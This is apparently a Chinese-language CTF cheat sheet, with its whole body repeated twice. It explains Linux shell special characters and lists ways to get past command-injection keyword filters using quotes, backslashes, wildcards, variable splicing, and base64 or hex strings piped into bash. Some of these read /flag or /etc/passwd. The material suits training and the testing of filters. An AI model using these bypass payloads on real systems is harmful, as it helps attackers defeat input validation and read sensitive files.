命令执行一些特殊作用的字符 | Linux Bypass
# Command Bypass | Linux
## # 特殊字符作用
### `$`
${n}表示输入的第n个参数,0-9不用加{},但是到了10以后就要使用`${10}`
`cd $0 ~ $9`表示切换到当前用户根目录~
$<name> 表示全局变量
### `!`
简单来说,叹号可以单独成一个文件夹,也可以作为文件夹的末位字符,说白了,叹号后面不能加东西,叹号加字符代表着特殊含义
```bash
!! --> 执行上一条命令
!$ --> 上一个命令的最后一个参数
!^ --> 上一个命令的第一个参数
!:- --> 去掉最后一个参数执行上一个命令
!* --> 使用上条命令的所有参数
命令 !上一条命令:参数所在位置 --> 使用上一条参数的指定参数加入到现在这条命令中
!历史命令数值 --> 执行 history 中指定对应条数的命令
!-2 --> 执行 history 中倒数第二条命令
!关键字 --> 执行上一条包含命令关键字的命令
!!:gs/old/new --> 将上条命令中的 old 替换为 new
逻辑非 ls !(*.cfg)
```
可以看到如果前面执行过`cat /flag`的话那么执行`!cat`就是执行匹配到的`cat /flag`命令
但是如果先执行`cat /flag`再执行`cat /etc/passwd`那么执行`!cat`就只会输出passwd而不会输出/flag
比赛中无法绕过flag关键字的过滤的话,若全部人是在同一环境下,那么我们一直执行`!cat`就能看到其他队伍的cat内容,如果有其他人是通过cat输出flag那么我们也可以得到flag
### `
### `.`
.表示当前的shell(如/bash/shell)
### `;`
```bash
用;号隔开每个命令, 每个命令按照从左到右的顺序,顺序执行, 彼此之间不关心是否失败, 所有命令都会执行。
```
### `|`
管道符
```bash
| 表示管道,上一条命令的输出,作为下一条命令的参数
```
### `||`
```bash
即逻辑或(短路或)
||左边为真时,则右边不执行
||左边为假时,才会继续执行右边
[root@VM-16-13-centos ~]# echo 1 || echo 2
1
```
### `&`
```bash
& 放在启动参数后面表示设置此进程为后台进程
语法:command1 &
此外在CTF中,它又表示先执行右边再执行左边
语法:command1 & command2
ping 127.0.0.1 & ls(先执行ls后执行ping)
```
### `&&`
```bash
逻辑与,和||恰恰相反。
先执行左边,只有左边为真,才会执行右边
语法:command1 && command2 [&& command3 ...]
```
### `{}与()`
```bash
1、(command1;command2;command3....)`
2、{ command1;command2;command3…}` #第一条命令必须与左边的括号有一个空格,最后一条命令一定要有分号
3、{command,argument}
相同点:
()和{}都是把一串的命令放在括号里面,并且命令之间用;号隔开
不同点
()只是对一串命令重新开一个子shell进行执行,{}对一串命令在当前shell执行
()最后一个命令可以不用分号,{}最后一个命令要用分号
()里的第一个命令和左边括号不必有空格,{}的第一个命令和左括号之间必须要有一个空格
()和{}中括号里面的某个命令的重定向只影响该命令,但括号外的重定向则影响到括号里的所有命令
```
```bash
root@A1u[14:42:02]:~$ pwd;cat /flag
/root
flag{th1s_1s_fl0g}
root@A1u[14:45:18]:~$ cat /flag;pwd
flag{th1s_1s_fl0g}
/root
root@A1u[14:45:23]:~$ {cat,/flag}
flag{th1s_1s_fl0g}
root@A1u[14:45:28]:~$ { cat /flag;pwd;}
flag{th1s_1s_fl0g}
/root
root@A1u[14:45:33]:~$ {cat /flag;pwd;}
-bash: syntax error near unexpected token `}'
root@A1u[14:45:38]:~$ { cat /flag;pwd}
> ^C
root@A1u[14:45:48]:~$ { cat /flag,pwd;}
cat: /flag,pwd: No such file or directory
root@A1u[14:47:23]:~$ { pwd,cat /flag;}
-bash: pwd,cat: command not found
```
### 输入/输出的重定向
```bash
command > file 将输出重定向到 file
command < file 将输入重定向到 file
command >> file 将输出以追加的方式重定向到 file
n > file 将文件描述符为 n 的文件重定向到 file。
n >> file 将文件描述符为 n 的文件以追加的方式重定向到 file。
n >& m 将输出文件 m 和 n 合并。
n <& m 将输入文件 m 和 n 合并。
<< tag 将开始标记 tag 和结束标记 tag 之间的内容作为输入。
```
## 一些特殊的Trick(绕过命令字符的检测)
- 通配符`*`与`?`
```bash
cat /f* <=> 输出所有f开头的文件
cat /f??? <=> 输出所有f开头且文件名为四个字符的文件
```
- `[]`与`{}`的绕过
```bash
cat /f[a-z]ag <=>输出/flag /flbg ... /flzg
cat /f{l,a,b}ag <=>输出/flag /faag /fbag
```
- 关键字绕过
- `命令提示符$:使用$*、$@、$x(x代表1-9,$0表示Shell本身的文件名故不可用)、${x}(x>=10)
- **在没有传参的情况下,这些值都是空**
- 但如果执行`cd $0` ... `cd $9`就是转到~目录
- ```bash
ca$*t 1.txt //$* 是传给脚本的所有参数的列表
ca$@t 1.txt //$@ 是传给脚本的所有参数的列表
ca$9t 1.txt //$9 是传递给该shell脚本的第九个参数
ca${11}t 1.txt //${x} 两位数以上用${}括起来
```
- 反斜杠
```bash
ca\t /flag <=>cat /flag
ca\t /f\lag <=>cat /flag
```
- 连接符——单引号||双引号
```bash
双引号:
""t /flag
cat "/fl""ag"
ca""t "/fl""ag
单引号:
ca''t /flag
cat '/fl''ag'
ca''t '/fl''ag'
```
- 变量拼接
```bash
1. a=ca;b=t;$a$b 1.txt
2. a=/flag&& cat $a
3. a=$'/flag' && cat $a
4. a=g;cat /fla$a
3. a="lxs/";b=${a:0:1}${a:2:1}${IFS}${a:3:1};$b
利用截取凑成: ls /
```
- 编码绕过
- base64编码绕过:``echo 'Y2F0Cg==' | base64 -d` 1.txt `
- base64编码绕过:`echo 'Y2F0IDEudHh0' | base64 -d |bash(或sh) `
- base64+sh、bash执行:`echo '636174202f666c6167'|xxd -r -p|bash `其中:xxd -r -p 将某种列格式的纯十六进制转储读入,也可以加上 0x 的前缀
- 特殊的字符替代方式
```bash
echo ${PS2} 对应字符 >
echo ${PS4} 对应字符 +
echo ${IFS} 对应 内部字段分隔符
echo ${9} 对应 空字符串
```
- 此外还有`8进制 + `${}`写shell` ` 8进制 + `$()`执行` `16进制 + `$()`执行`可以到参考文章找
#### 特殊目录
- /dev/null
- ~account
- /tmp 具有sbit权限
- /dev/shm/
- /lost+found/
### More
更多的Bypass可以看下面的参考文章:
https://blog.csdn.net/weixin_45669205/article/details/114797942 (CTF中的Bypass命令执行)
https://cloud.tencent.com/developer/article/1683278 (文件&目录小技巧 | Linux后门系列)
https://blog.csdn.net/rfrder/article/details/115047047 (有长度限制的命令执行)
## # 特殊字符作用
### `$`
${n}表示输入的第n个参数,0-9不用加{},但是到了10以后就要使用`${10}`
`cd $0 ~ $9`表示切换到当前用户根目录~
$<name> 表示全局变量
### `!`
简单来说,叹号可以单独成一个文件夹,也可以作为文件夹的末位字符,说白了,叹号后面不能加东西,叹号加字符代表着特殊含义
```bash
!! --> 执行上一条命令
!$ --> 上一个命令的最后一个参数
!^ --> 上一个命令的第一个参数
!:- --> 去掉最后一个参数执行上一个命令
!* --> 使用上条命令的所有参数
命令 !上一条命令:参数所在位置 --> 使用上一条参数的指定参数加入到现在这条命令中
!历史命令数值 --> 执行 history 中指定对应条数的命令
!-2 --> 执行 history 中倒数第二条命令
!关键字 --> 执行上一条包含命令关键字的命令
!!:gs/old/new --> 将上条命令中的 old 替换为 new
逻辑非 ls !(*.cfg)
```
可以看到如果前面执行过`cat /flag`的话那么执行`!cat`就是执行匹配到的`cat /flag`命令
但是如果先执行`cat /flag`再执行`cat /etc/passwd`那么执行`!cat`就只会输出passwd而不会输出/flag
比赛中无法绕过flag关键字的过滤的话,若全部人是在同一环境下,那么我们一直执行`!cat`就能看到其他队伍的cat内容,如果有其他人是通过cat输出flag那么我们也可以得到flag
### `
### `.`
.表示当前的shell(如/bash/shell)
### `;`
```bash
用;号隔开每个命令, 每个命令按照从左到右的顺序,顺序执行, 彼此之间不关心是否失败, 所有命令都会执行。
```
### `|`
管道符
```bash
| 表示管道,上一条命令的输出,作为下一条命令的参数
```
### `||`
```bash
即逻辑或(短路或)
||左边为真时,则右边不执行
||左边为假时,才会继续执行右边
[root@VM-16-13-centos ~]# echo 1 || echo 2
1
```
### `&`
```bash
& 放在启动参数后面表示设置此进程为后台进程
语法:command1 &
此外在CTF中,它又表示先执行右边再执行左边
语法:command1 & command2
ping 127.0.0.1 & ls(先执行ls后执行ping)
```
### `&&`
```bash
逻辑与,和||恰恰相反。
先执行左边,只有左边为真,才会执行右边
语法:command1 && command2 [&& command3 ...]
```
### `{}与()`
```bash
1、(command1;command2;command3....)`
2、{ command1;command2;command3…}` #第一条命令必须与左边的括号有一个空格,最后一条命令一定要有分号
3、{command,argument}
相同点:
()和{}都是把一串的命令放在括号里面,并且命令之间用;号隔开
不同点
()只是对一串命令重新开一个子shell进行执行,{}对一串命令在当前shell执行
()最后一个命令可以不用分号,{}最后一个命令要用分号
()里的第一个命令和左边括号不必有空格,{}的第一个命令和左括号之间必须要有一个空格
()和{}中括号里面的某个命令的重定向只影响该命令,但括号外的重定向则影响到括号里的所有命令
```
```bash
root@A1u[14:42:02]:~$ pwd;cat /flag
/root
flag{th1s_1s_fl0g}
root@A1u[14:45:18]:~$ cat /flag;pwd
flag{th1s_1s_fl0g}
/root
root@A1u[14:45:23]:~$ {cat,/flag}
flag{th1s_1s_fl0g}
root@A1u[14:45:28]:~$ { cat /flag;pwd;}
flag{th1s_1s_fl0g}
/root
root@A1u[14:45:33]:~$ {cat /flag;pwd;}
-bash: syntax error near unexpected token `}'
root@A1u[14:45:38]:~$ { cat /flag;pwd}
> ^C
root@A1u[14:45:48]:~$ { cat /flag,pwd;}
cat: /flag,pwd: No such file or directory
root@A1u[14:47:23]:~$ { pwd,cat /flag;}
-bash: pwd,cat: command not found
```
### 输入/输出的重定向
```bash
command > file 将输出重定向到 file
command < file 将输入重定向到 file
command >> file 将输出以追加的方式重定向到 file
n > file 将文件描述符为 n 的文件重定向到 file。
n >> file 将文件描述符为 n 的文件以追加的方式重定向到 file。
n >& m 将输出文件 m 和 n 合并。
n <& m 将输入文件 m 和 n 合并。
<< tag 将开始标记 tag 和结束标记 tag 之间的内容作为输入。
```
## 一些特殊的Trick(绕过命令字符的检测)
- 通配符`*`与`?`
```bash
cat /f* <=> 输出所有f开头的文件
cat /f??? <=> 输出所有f开头且文件名为四个字符的文件
```
- `[]`与`{}`的绕过
```bash
cat /f[a-z]ag <=>输出/flag /flbg ... /flzg
cat /f{l,a,b}ag <=>输出/flag /faag /fbag
```
- 关键字绕过
- `命令提示符$:使用$*、$@、$x(x代表1-9,$0表示Shell本身的文件名故不可用)、${x}(x>=10)
- **在没有传参的情况下,这些值都是空**
- 但如果执行`cd $0` ... `cd $9`就是转到~目录
- ```bash
ca$*t 1.txt //$* 是传给脚本的所有参数的列表
ca$@t 1.txt //$@ 是传给脚本的所有参数的列表
ca$9t 1.txt //$9 是传递给该shell脚本的第九个参数
ca${11}t 1.txt //${x} 两位数以上用${}括起来
```
- 反斜杠
```bash
ca\t /flag <=>cat /flag
ca\t /f\lag <=>cat /flag
```
- 连接符——单引号||双引号
```bash
双引号:
""t /flag
cat "/fl""ag"
ca""t "/fl""ag
单引号:
ca''t /flag
cat '/fl''ag'
ca''t '/fl''ag'
```
- 变量拼接
```bash
1. a=ca;b=t;$a$b 1.txt
2. a=/flag&& cat $a
3. a=$'/flag' && cat $a
4. a=g;cat /fla$a
3. a="lxs/";b=${a:0:1}${a:2:1}${IFS}${a:3:1};$b
利用截取凑成: ls /
```
- 编码绕过
- base64编码绕过:``echo 'Y2F0Cg==' | base64 -d` 1.txt `
- base64编码绕过:`echo 'Y2F0IDEudHh0' | base64 -d |bash(或sh) `
- base64+sh、bash执行:`echo '636174202f666c6167'|xxd -r -p|bash `其中:xxd -r -p 将某种列格式的纯十六进制转储读入,也可以加上 0x 的前缀
- 特殊的字符替代方式
```bash
echo ${PS2} 对应字符 >
echo ${PS4} 对应字符 +
echo ${IFS} 对应 内部字段分隔符
echo ${9} 对应 空字符串
```
- 此外还有`8进制 + `${}`写shell` ` 8进制 + `$()`执行` `16进制 + `$()`执行`可以到参考文章找
#### 特殊目录
- /dev/null
- ~account
- /tmp 具有sbit权限
- /dev/shm/
- /lost+found/
### More
更多的Bypass可以看下面的参考文章:
https://blog.csdn.net/weixin_45669205/article/details/114797942 (CTF中的Bypass命令执行)
https://cloud.tencent.com/developer/article/1683278 (文件&目录小技巧 | Linux后门系列)
https://blog.csdn.net/rfrder/article/details/115047047 (有长度限制的命令执行)
